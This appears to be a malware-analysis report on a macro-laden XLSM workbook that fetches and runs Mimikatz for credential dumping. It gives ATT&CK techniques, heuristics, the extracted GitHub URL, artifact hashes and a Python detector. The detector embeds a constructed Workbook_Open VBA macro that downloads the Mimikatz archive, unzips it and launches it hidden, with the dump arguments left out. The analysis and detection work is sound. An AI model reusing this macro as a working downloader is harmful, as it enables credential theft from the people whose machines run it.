Verdict: MALICIOUS (risk score 182)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample is an XLSM workbook containing VBA macros. The macro calls URLDownloadToFile (the urlmon.dll API) to fetch a Mimikatz release archive from a GitHub URL and save it as C:\Windows\Temp\goodware.zip, a filename chosen to look benign. It then attempts to unzip the archive and run mimikatz.exe with credential-dumping commands, redirecting the output to C:\Windows\Temp\mimikatz_output.log. The behaviour is credential dumping: secrets are staged on disk in a file the attacker can collect later. Two points for responders: the payload is served from github.com, so URL or domain reputation alone will not flag the download, and dumping LSASS credentials requires administrative privileges, so on a standard-user host the chain may fail after the download stage while still leaving goodware.zip behind. Both temp-directory paths are the host artifacts to hunt for.
Heuristics (5)

| Rule ID | Severity | Description |
|---|---|---|
| OLE_VBA_SHELL | critical | Shell() call in VBA |
| OLE_VBA_DOWNLOAD | critical | URLDownloadToFile in VBA |
| OLE_VBA_CREATEOBJ | high | CreateObject call |
| OOXML_VBA | medium | VBA project inside OOXML: the document contains a VBA project, so macros are present |
| EMBEDDED_URL | info | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URL: https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| macros.bas | ee470a5768035b4419e94bd60e7e7524f4b70b237862bd0262a3914021b93851 | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3049 bytes |
| vbaProject_00.bin | 99ef716040a3e667aa2409d8fca6a1d84b3a098fc5b9f18756477aa8a605f8ea | vba-project | OOXML VBA project: xl/vbaProject.bin | 36352 bytes |
| emf_00.emf | b04b3fa5751cca12ab6f453fb005676552aa48db7807d04d89fc3ee9f098b5d6 | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2712 bytes |
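The following Python is an added example, not the analyzer's or oletools' own code. It re-creates the two static passes behind the report above: carving and hashing the OOXML parts listed under "Extracted artifacts" (which also yields the OOXML_VBA heuristic), and pattern-matching decoded VBA source for the OLE_VBA_SHELL, OLE_VBA_DOWNLOAD, OLE_VBA_CREATEOBJ and EMBEDDED_URL heuristics. The regexes, the constructed VBA source and the placeholder XLSM container are this example's own assumptions; in particular the VBA is written in the shape the summary describes, not copied from the sample, and the dump arguments are omitted. Real macro source inside xl/vbaProject.bin is MS-OVBA compressed, and decoding it is exactly what oletools.olevba does, so the scanner here takes already-decoded source as input.

```python
"""Re-create the report's static checks on an XLSM (added example, not the
analyzer's code): carve OOXML parts with SHA-256 like the artifacts table,
and scan decoded VBA source for the OLE_VBA_* / EMBEDDED_URL heuristics."""
import hashlib
import io
import re
import zipfile

# Rule IDs are the report's; the regexes are this example's own assumptions.
# The Shell rule excludes "WScript.Shell" / "obj.Shell" via the lookbehind.
VBA_RULES = {
    "OLE_VBA_SHELL": ("critical", re.compile(r'(?<![.\w])Shell\s*[("]', re.I)),
    "OLE_VBA_DOWNLOAD": ("critical", re.compile(r"\bURLDownloadToFile[AW]?\b", re.I)),
    "OLE_VBA_CREATEOBJ": ("high", re.compile(r"\bCreateObject\s*\(", re.I)),
}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)


def scan_vba_source(src: str) -> dict:
    """Return the rules that fire ({rule_id: severity}) and the URLs found."""
    hits = {rid: sev for rid, (sev, rx) in VBA_RULES.items() if rx.search(src)}
    # Join VBA string concatenation ("a" & _ <newline> "b") so a URL split
    # across lines to defeat naive greps is recovered before extraction.
    joined = re.sub(r'"\s*&\s*_?\s*"', "", src)
    return {"hits": hits, "urls": sorted(set(URL_RE.findall(joined)))}


def carve_ooxml(data: bytes) -> dict:
    """List VBA project and EMF media parts of an OOXML zip with SHA-256."""
    out = {"OOXML_VBA": False, "artifacts": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                out["OOXML_VBA"] = True          # macros present (medium)
                kind = "vba-project"
            elif low.startswith("xl/media/") and low.endswith(".emf"):
                kind = "ooxml-emf"
            else:
                continue
            blob = zf.read(name)
            out["artifacts"].append({
                "part": name, "kind": kind, "size": len(blob),
                "sha256": hashlib.sha256(blob).hexdigest(),
            })
    return out


def analyze(xlsm_bytes: bytes, decoded_vba: str) -> dict:
    """Combine container carving with the VBA source scan into one report."""
    report = carve_ooxml(xlsm_bytes)
    report.update(scan_vba_source(decoded_vba))
    return report


# Constructed VBA in the shape the report describes (not the real macro; the
# mimikatz dump arguments are deliberately left out).
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    Dim u As String
    u = "https://github.com/gentilkiwi/mimikatz/releases/download/" & _
        "2.2.0-20220919/mimikatz_trunk.zip"
    URLDownloadToFileA 0, u, "C:\Windows\Temp\goodware.zip", 0, 0
    Set sh = CreateObject("Shell.Application")
    sh.Namespace("C:\Windows\Temp").CopyHere sh.Namespace("C:\Windows\Temp\goodware.zip").Items
    Shell "cmd /c C:\Windows\Temp\mimikatz.exe > C:\Windows\Temp\mimikatz_output.log", vbHide
End Sub
'''


def build_sample_xlsm() -> bytes:
    """Construct a minimal OOXML container holding the two part names the
    report carved. Part contents are placeholders (OLE magic, EMR_HEADER
    record type), not a real VBA project or image."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
        zf.writestr("xl/media/image1.emf", b"\x01\x00\x00\x00" + b"\x00" * 28)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(build_sample_xlsm(), SAMPLE_VBA), indent=2))
```

Run it on a real workbook by replacing `build_sample_xlsm()` with the file's bytes and `SAMPLE_VBA` with the source olevba decodes; the string-concatenation join matters because splitting the URL across `& _` continuations is a common way to hide it from single-line greps.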